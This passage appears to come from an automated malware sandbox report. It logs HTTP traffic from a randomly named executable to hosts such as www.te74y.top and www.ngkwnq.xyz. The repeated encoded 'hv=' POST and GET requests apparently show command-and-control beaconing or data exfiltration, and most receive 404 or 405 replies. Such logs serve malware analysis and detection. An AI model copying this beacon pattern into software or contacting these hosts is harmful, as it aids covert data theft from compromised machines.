                                                    Data Raw: 68 76 3d 59 54 43 66 6a 71 74 52 77 6f 47 56 6e 59 44 6f 4e 30 35 57 69 41 6c 62 77 33 48 65 6c 34 65 6b 30 4c 4e 79 62 47 70 35 57 54 73 36 36 59 75 54 31 70 4c 2f 44 47 66 66 4a 56 4a 7a 2b 68 76 31 2f 2f 32 2b 77 4b 6d 42 55 4b 34 49 68 6e 39 76 41 6b 77 73 39 46 2b 55 67 51 44 38 4b 44 65 54 59 79 58 6b 31 79 41 58 64 4e 64 6b 35 69 72 48 62 55 59 37 79 36 4e 44 6d 73 6a 4d 68 4a 56 36 43 2f 34 57 73 64 33 74 44 4d 50 35 67 55 5a 6f 78 48 57 6d 56 78 54 55 4f 4b 33 6f 75 73 36 50 4a 53 37 68 63 41 6f 65 72 74 59 48 38 76 2f 73 31 6a 64 4a 49 79 4a 58 73 69 6a 37 48 56 69 71 4d 6f 71 62 49 71 66 4b 50 37 47 36 6f 56 55 6a 56 45 2f 4d 46 39 49 71 2f 68 2b 6e 4c 71 4a 48 2f 7a 70 32 51 72 46 5a 43 62 48 36 31 34 39 62 6b 66 7a 5a 4c 2b 53 41 58 49 49 4f 6f 31 63 35 2f 68 32 4c 61 30 73 37 6d 7a 65 62 4e 71 75 53 43 4d 31 34 6c 77 47 33 6c 72 59 42 52 72 51 6c 49 47 51 42 4f 5a 42 72 50 42 36 57 38 79 52 53 77 64 4e 54 76 2b 65 4a 2f 45 7a 39 30 6a 70 2b 68 55 68 74 41 4c 5a 7a 55 6e 4b 4e 2f 74 69 [TRUNCATED]
                                                    Data Ascii: hv=YTCfjqtRwoGVnYDoN05WiAlbw3Hel4ek0LNybGp5WTs66YuT1pL/DGffJVJz+hv1//2+wKmBUK4Ihn9vAkws9F+UgQD8KDeTYyXk1yAXdNdk5irHbUY7y6NDmsjMhJV6C/4Wsd3tDMP5gUZoxHWmVxTUOK3ous6PJS7hcAoertYH8v/s1jdJIyJXsij7HViqMoqbIqfKP7G6oVUjVE/MF9Iq/h+nLqJH/zp2QrFZCbH6149bkfzZL+SAXIIOo1c5/h2La0s7mzebNquSCM14lwG3lrYBRrQlIGQBOZBrPB6W8yRSwdNTv+eJ/Ez90jp+hUhtALZzUnKN/tixCtotfAhGxZADnDFqaxpHnFZ3FlGO0JjHa5q9ghJq/6IgnK298RhFfYdQtwfLBpO89oMYu8C2llFnijf+WIB6sE8BAiWbF7Ir4gNk1q9osvaRqdgn/ScX1f7xfaej0vawXjFDqbN7+G06kSE3Km/TXXx1Ah20luqNUKvPa4odNzBXYKEYcjd8omE9S2PkXzdOutlyVpWce9zom751hdPIcqfhEiuqLTt6LMtwCtPG1XouOeT73yDi3mthAENr5RtkTVQdDzEAKcvwEKmEzstnfP2eoN+V3BhbggIZrcdTwUe3W3Tz8Rh+TfedXfG0kBBtY3CBa6j3bfsDusRpWJcVMw7uqzx+zsTr4cnKc+CJM0xI9BnmzRJ6JGu5ld+j5Iu4AR24Dikm8oTOkRbmk/GzfhYSzVzro9hO+IlzeN7ei1u4x3ujIfUPGzHLMajZGWBkfMmXzDeh8nNncowWShG0Me1lzrg3vrcvASv5VXSLYeyHkrm/MT57s5vt6/6Dp6SPWdlJQvaXF/hlpvClvlEnDnYNAP+AuEUMWY5gn1dteY3KlcYY4tKKksvs+SYRxQVOQ3WJrGsr6QoBm7KNq7BVdh9NpGYqY++x5OotjLCgxzI7hrnZ9+57fLcPBhCGZe2x/xI7dNGPRDj6BIntyEZA2BEC8SE6O8Djz [TRUNCATED]
                                                    Jul 1, 2024 15:46:14.980087996 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:14 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 6c 77 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.84973881.88.48.71805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:16.815717936 CEST355OUTGET /8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.aquamotricidad.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:17.502912998 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:17 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 6c 77 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.84973938.47.207.94805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:22.568198919 CEST599OUTPOST /fuua/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.te74y.top
                                                    Origin: http://www.te74y.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.te74y.top/fuua/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 36 64 6c 78 64 65 78 43 6e 4b 58 41 32 2f 45 73 4a 2f 51 37 72 59 51 39 37 61 67 50 6e 58 6b 36 6f 6b 6c 53 4e 47 63 44 68 71 55 68 31 72 4b 55 59 65 69 4c 32 6c 46 68 30 6a 64 42 33 4a 30 63 79 72 30 34 79 70 6d 2b 47 46 63 4f 73 58 55 61 58 31 56 43 34 39 34 46 2f 33 4f 79 47 4e 59 69 50 4b 4d 45 42 39 63 63 49 44 77 41 46 57 5a 48 41 71 59 77 37 54 46 63 47 51 4d 77 67 4c 2b 34 44 36 62 52 71 6a 76 33 70 75 75 42 39 49 57 4a 70 34 56 58 65 77 58 61 61 57 77 79 48 64 39 59 64 76 4d 6b 44 68 54 63 43 31 57 76 47 52 65 71 41 65 6c 34 47 50 45 58 75 47 46 70 42 57 71 55 71 35 49 51 2f 46 41 3d
                                                    Data Ascii: hv=6dlxdexCnKXA2/EsJ/Q7rYQ97agPnXk6oklSNGcDhqUh1rKUYeiL2lFh0jdB3J0cyr04ypm+GFcOsXUaX1VC494F/3OyGNYiPKMEB9ccIDwAFWZHAqYw7TFcGQMwgL+4D6bRqjv3puuB9IWJp4VXewXaaWwyHd9YdvMkDhTcC1WvGReqAel4GPEXuGFpBWqUq5IQ/FA=
                                                    Jul 1, 2024 15:46:23.513964891 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.84974038.47.207.94805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:25.104338884 CEST619OUTPOST /fuua/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.te74y.top
                                                    Origin: http://www.te74y.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.te74y.top/fuua/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 36 64 6c 78 64 65 78 43 6e 4b 58 41 33 65 55 73 4f 66 73 37 38 6f 51 2b 30 36 67 50 79 6e 6b 2b 6f 6b 70 53 4e 44 38 74 68 59 41 68 32 4f 4f 55 5a 66 69 4c 31 6c 46 68 73 54 64 45 7a 4a 30 44 79 72 6f 77 79 72 79 2b 47 46 59 4f 73 53 6f 61 58 6d 4e 4e 2b 39 34 48 33 58 4f 38 43 4e 59 69 50 4b 4d 45 42 39 59 32 49 44 6f 41 46 6c 42 48 43 4c 59 33 6e 6a 46 66 52 67 4d 77 6b 4c 2b 6b 44 36 62 6a 71 67 72 4f 70 6f 69 42 39 4e 53 4a 70 74 68 51 48 41 57 52 46 6d 78 66 44 4d 59 54 56 4d 77 52 50 41 2f 43 4d 55 36 55 48 6e 7a 41 61 38 74 2b 46 50 73 38 75 46 74 66 45 68 33 38 77 61 59 67 68 53 58 48 7a 50 70 71 41 2b 70 6e 4d 71 76 56 65 2f 45 2b 63 51 37 68
                                                    Data Ascii: hv=6dlxdexCnKXA3eUsOfs78oQ+06gPynk+okpSND8thYAh2OOUZfiL1lFhsTdEzJ0Dyrowyry+GFYOsSoaXmNN+94H3XO8CNYiPKMEB9Y2IDoAFlBHCLY3njFfRgMwkL+kD6bjqgrOpoiB9NSJpthQHAWRFmxfDMYTVMwRPA/CMU6UHnzAa8t+FPs8uFtfEh38waYghSXHzPpqA+pnMqvVe/E+cQ7h
                                                    Jul 1, 2024 15:46:26.002897024 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.84974138.47.207.94805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:27.648333073 CEST1636OUTPOST /fuua/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.te74y.top
                                                    Origin: http://www.te74y.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.te74y.top/fuua/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 36 64 6c 78 64 65 78 43 6e 4b 58 41 33 65 55 73 4f 66 73 37 38 6f 51 2b 30 36 67 50 79 6e 6b 2b 6f 6b 70 53 4e 44 38 74 68 59 34 68 31 34 79 55 59 38 4b 4c 30 6c 46 68 68 7a 64 46 7a 4a 31 5a 79 72 67 30 79 72 4f 55 47 48 51 4f 2b 67 77 61 41 6e 4e 4e 72 4e 34 48 37 33 4f 78 47 4e 5a 32 50 4a 30 49 42 38 6f 32 49 44 6f 41 46 6b 78 48 47 61 59 33 30 7a 46 63 47 51 4e 2f 67 4c 2b 59 44 37 7a 4a 71 6a 48 65 6f 59 43 42 39 74 69 4a 72 62 4e 51 4f 41 57 54 47 6d 78 48 44 4d 6b 63 56 49 59 56 50 41 37 6b 4d 58 71 55 4b 79 4f 32 46 66 42 66 52 4a 38 38 70 58 64 7a 43 69 58 42 2b 4d 6b 36 68 6c 72 31 31 34 70 67 58 39 31 35 44 4b 7a 59 4c 4c 59 56 52 56 2b 55 77 73 59 31 30 39 66 62 6d 77 68 57 63 57 30 74 79 43 55 52 6c 35 58 35 67 73 4d 6f 6b 33 67 4f 34 66 57 77 79 49 46 72 4b 76 2b 4d 69 79 72 36 71 67 4d 74 64 76 70 32 79 71 36 4b 55 67 71 6e 70 51 6d 44 35 62 57 51 50 32 32 36 70 6f 48 73 73 41 6b 51 71 75 2b 67 32 32 55 37 49 36 44 66 35 2f 65 75 48 53 75 36 31 72 57 46 66 79 43 48 64 68 32 [TRUNCATED]
                                                    Data Ascii: hv=6dlxdexCnKXA3eUsOfs78oQ+06gPynk+okpSND8thY4h14yUY8KL0lFhhzdFzJ1Zyrg0yrOUGHQO+gwaAnNNrN4H73OxGNZ2PJ0IB8o2IDoAFkxHGaY30zFcGQN/gL+YD7zJqjHeoYCB9tiJrbNQOAWTGmxHDMkcVIYVPA7kMXqUKyO2FfBfRJ88pXdzCiXB+Mk6hlr114pgX915DKzYLLYVRV+UwsY109fbmwhWcW0tyCURl5X5gsMok3gO4fWwyIFrKv+Miyr6qgMtdvp2yq6KUgqnpQmD5bWQP226poHssAkQqu+g22U7I6Df5/euHSu61rWFfyCHdh2NV61lOGokSRRDPSUnmualQhZ8p3yCA9CDOUbV7pijIgBSmtCkrjWs0l7mlDGpeSa9cpUs+UHNko4o3r4pdBvQ0i0XurhqdPz7vTllkQHr1LyRj2JB33UQmKPWT2aLGZ2rbCn07LGZZotIFc969OdMdCgOoEWm+12MN5ftICxsdEtHQ8YQpVPaI9BnTQ2/pFexR4Tdf69h+HE1LoQR+5MbliviH6RKD2NqOA2g9LY0IuE7AciViNM9PW03Az5FAkFUhhtcHAQqm43sf5plHog6gpgVZNzwCY58mvpyT5tnukdKDGHBQ17s3cjtwh2ktmwkz21Ne6noLcl05kaogs+TKlLeDifgJL5Fq3MeW/2ihFjADGjzc2DUaNrBx3aAgoDxgx83Ol3gOdxmmU4JguSzsNrO8jIX3AEVixcr/iOTdoscYJf3+mNwXCb7dYps0WxHWj5woKgJnt7A9zp6NlDiVFi1M7l5A+8PJ/QzRdK/K5DppzuFrAG1xl9pI79EupnhhRp+F1xDF6L20sZbFrG21l4WuZGxsfDN035Ksi175rxSgWIbbNcqqq1rXymKqlAQL1R91e4sYzNGJoukuStZ46EOJO+OxpJbbsw3GlZbBd5VAfRgrpXjagWaYHTWzx8HeYpAZje9oEKhTKIxk1gmMgm0Vgh7/38Pm [TRUNCATED]
                                                    Jul 1, 2024 15:46:28.541544914 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.84974238.47.207.94805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:30.174475908 CEST346OUTGET /fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.te74y.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:31.108263969 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.84974335.241.41.54805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:36.503489017 CEST602OUTPOST /44zl/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ngkwnq.xyz
                                                    Origin: http://www.ngkwnq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.ngkwnq.xyz/44zl/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 52 52 66 47 42 58 6a 4d 6b 30 72 32 38 43 6f 41 43 53 78 34 62 2b 31 50 71 6f 46 7a 52 79 2f 6d 4f 4f 65 71 62 2b 6f 4d 6d 34 6d 4f 50 4a 50 6c 5a 6b 56 67 56 6c 76 66 77 61 74 54 73 4c 30 31 5a 50 30 54 79 72 47 64 68 4e 5a 64 37 4c 36 30 58 64 58 69 38 6b 65 4b 63 78 68 62 51 76 46 43 37 63 49 34 55 72 75 79 35 31 71 71 37 71 68 74 58 44 70 79 61 70 45 37 33 37 56 55 62 77 32 44 77 63 41 72 64 71 45 6d 6f 78 4d 39 55 4a 49 49 4f 30 45 76 68 55 62 68 63 6e 37 53 6b 4c 51 6a 6c 73 44 69 37 7a 2b 72 50 45 79 69 51 62 67 4b 72 65 44 6c 4c 79 55 35 7a 4e 67 31 47 51 49 4f 6c 4b 56 47 52 4c 49 3d
                                                    Data Ascii: hv=RRfGBXjMk0r28CoACSx4b+1PqoFzRy/mOOeqb+oMm4mOPJPlZkVgVlvfwatTsL01ZP0TyrGdhNZd7L60XdXi8keKcxhbQvFC7cI4Uruy51qq7qhtXDpyapE737VUbw2DwcArdqEmoxM9UJIIO0EvhUbhcn7SkLQjlsDi7z+rPEyiQbgKreDlLyU5zNg1GQIOlKVGRLI=
                                                    Jul 1, 2024 15:46:37.154994965 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:37.158318043 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.84974435.241.41.54805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:39.032617092 CEST622OUTPOST /44zl/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ngkwnq.xyz
                                                    Origin: http://www.ngkwnq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.ngkwnq.xyz/44zl/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 52 52 66 47 42 58 6a 4d 6b 30 72 32 2b 68 77 41 46 78 70 34 63 65 31 49 32 59 46 7a 49 69 2f 69 4f 4a 57 71 62 2f 73 69 6e 4b 43 4f 50 6f 2f 6c 59 6d 74 67 55 6c 76 66 6f 71 74 53 6f 4c 30 75 5a 50 34 68 79 71 71 64 68 4f 6c 64 37 4b 6d 30 43 38 58 6a 75 45 65 4d 4a 68 68 5a 64 50 46 43 37 63 49 34 55 72 71 4d 35 31 79 71 36 61 78 74 57 68 52 39 58 4a 45 30 6e 72 56 55 4d 67 32 48 77 63 41 46 64 75 4d 63 6f 7a 45 39 55 4a 59 49 4f 46 45 75 75 55 62 64 44 33 36 58 69 34 42 4a 67 4c 50 6d 6c 46 6d 62 4a 79 43 76 59 4e 4e 67 78 38 4c 6a 49 79 38 53 7a 4f 49 44 44 6e 56 6d 2f 70 46 32 50 63 63 45 71 37 47 4b 4e 76 6d 71 55 6e 62 69 56 46 6a 36 31 62 45 67
                                                    Data Ascii: hv=RRfGBXjMk0r2+hwAFxp4ce1I2YFzIi/iOJWqb/sinKCOPo/lYmtgUlvfoqtSoL0uZP4hyqqdhOld7Km0C8XjuEeMJhhZdPFC7cI4UrqM51yq6axtWhR9XJE0nrVUMg2HwcAFduMcozE9UJYIOFEuuUbdD36Xi4BJgLPmlFmbJyCvYNNgx8LjIy8SzOIDDnVm/pF2PccEq7GKNvmqUnbiVFj61bEg
                                                    Jul 1, 2024 15:46:39.689910889 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:39 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:39.692758083 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.84974535.241.41.54805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:41.568326950 CEST1639OUTPOST /44zl/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ngkwnq.xyz
                                                    Origin: http://www.ngkwnq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.ngkwnq.xyz/44zl/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
